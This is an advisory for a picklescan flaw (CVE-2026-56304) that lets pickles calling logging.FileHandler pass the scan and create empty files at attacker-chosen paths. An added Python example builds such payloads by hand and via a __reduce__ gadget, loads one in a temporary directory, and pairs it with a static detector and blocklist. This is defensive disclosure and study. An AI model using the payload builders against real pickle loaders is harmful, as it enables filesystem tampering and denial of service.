PT-2026-51155 · Picklescan · Picklescan
Ez-Lbz · Published 2026-06-20 · Updated 2026-06-20 · CVE-2026-56304
| CVSS v3.1 | 6.5 (Medium) |
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L |
Name of the Vulnerable Software and Affected Versions
picklescan versions prior to 1.0.1
Description
picklescan versions prior to 1.0.1 do not flag pickle files that instantiate the logging.FileHandler class. The constructor of that class opens the given filename for appending and creates it if it does not exist, so a crafted pickle that passes the scan leaves an empty (zero-byte) file at an attacker-chosen path on the system that loads it, subject only to the filesystem permissions of the loading process, without triggering the remote code execution (RCE) blocklist. An unauthenticated attacker who can supply a pickle file to be scanned and loaded can use this to create lock files or other filesystem artifacts, which may disrupt the application or cause a denial of service.
Recommendations
Update to version 1.0.1.
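Added example, not code from the advisory or from the picklescan project. The first function hand-assembles the pickle opcodes that make the unpickler call logging.FileHandler(path); the second produces the same call the way a gadget class with __reduce__ would, serialized by pickle itself at protocol 4 (which emits STACK_GLOBAL instead of GLOBAL). load_and_measure performs the unsafe load and reports the artifact: a file that exists but holds no bytes, because the handler is never attached to a logger. find_globals is a minimal static pass over the opcode stream with pickletools that flags the import without executing the pickle. The FILESYSTEM_GLOBALS set, the app.lock file name and all function names are assumptions made for this demonstration; they are not picklescan's blocklist or its 1.0.1 fix.

```python
import logging
import os
import pickle
import pickletools
import tempfile
from typing import List, Tuple


def build_filehandler_payload(path: str) -> bytes:
    """Hand-built protocol 2 stream: on load the unpickler imports
    logging.FileHandler, pushes (path,) and REDUCEs, i.e. FileHandler(path)."""
    encoded = path.encode("utf-8")
    return (
        b"\x80\x02"                                             # PROTO 2
        + b"clogging\nFileHandler\n"                            # GLOBAL logging.FileHandler
        + b"X" + len(encoded).to_bytes(4, "little") + encoded   # BINUNICODE path
        + b"\x85"                                               # TUPLE1 -> (path,)
        + b"R"                                                  # REDUCE -> FileHandler(path)
        + b"."                                                  # STOP
    )


class _FileHandlerGadget:
    """Constructed gadget: pickle serializes it as a FileHandler(path) call."""

    def __init__(self, path: str):
        self.path = path

    def __reduce__(self):
        return (logging.FileHandler, (self.path,))


def build_filehandler_payload_p4(path: str) -> bytes:
    """Same effect, but emitted by pickle itself with STACK_GLOBAL (protocol 4)."""
    return pickle.dumps(_FileHandlerGadget(path), protocol=4)


def load_and_measure(payload: bytes, path: str) -> int:
    """The unsafe step a scanner is meant to prevent. Returns the size of the
    file left at `path`, or -1 if loading created nothing."""
    if os.path.exists(path):
        raise FileExistsError(path)
    obj = pickle.loads(payload)        # FileHandler.__init__ opens path in 'a' mode
    if isinstance(obj, logging.FileHandler):
        obj.close()                    # nothing was logged, so the file stays empty
    return os.path.getsize(path) if os.path.exists(path) else -1


# Constructed blocklist for this example (not picklescan's): classes whose
# constructor touches the filesystem without running attacker-supplied code.
FILESYSTEM_GLOBALS = {
    ("logging", "FileHandler"),
    ("logging.handlers", "RotatingFileHandler"),
    ("logging.handlers", "TimedRotatingFileHandler"),
    ("logging.handlers", "WatchedFileHandler"),
}

STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def find_globals(data: bytes) -> List[Tuple[str, str]]:
    """Static walk of the opcode stream (no unpickling): collect every
    (module, name) pair imported via GLOBAL or STACK_GLOBAL."""
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)   # pickletools joins the pair with a space
            found.append((module, name))
        elif op.name in STRING_OPS:
            strings.append(arg)
        elif op.name == "STACK_GLOBAL":
            # Heuristic: the serializer pushes module then name right before
            # STACK_GLOBAL, so the two most recent string pushes are the pair.
            if len(strings) >= 2:
                found.append((strings[-2], strings[-1]))
    return found


def flag_filesystem_globals(data: bytes) -> List[Tuple[str, str]]:
    return [g for g in find_globals(data) if g in FILESYSTEM_GLOBALS]


def run_demo() -> dict:
    """Create the artifact in a throwaway directory and scan both encodings."""
    with tempfile.TemporaryDirectory() as tmp:
        target = os.path.join(tmp, "app.lock")   # constructed target path
        payload = build_filehandler_payload(target)
        return {
            "created_size": load_and_measure(payload, target),
            "flagged_p2": flag_filesystem_globals(payload),
            "flagged_p4": flag_filesystem_globals(build_filehandler_payload_p4(target)),
            "flagged_benign": flag_filesystem_globals(pickle.dumps({"weights": [1, 2, 3]})),
        }


if __name__ == "__main__":
    print(run_demo())
```

Run it directly to print the result; the file is created under a temporary directory that is removed afterwards. The STACK_GLOBAL handling is deliberately a heuristic (the two most recent string pushes), which is enough for streams produced by the standard serializer but is not a substitute for a full stack emulation in a production scanner.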
Fix
Weakness Enumeration
Deserialization of Untrusted Data (CWE-502)
Related Identifiers
Affected Products
Picklescan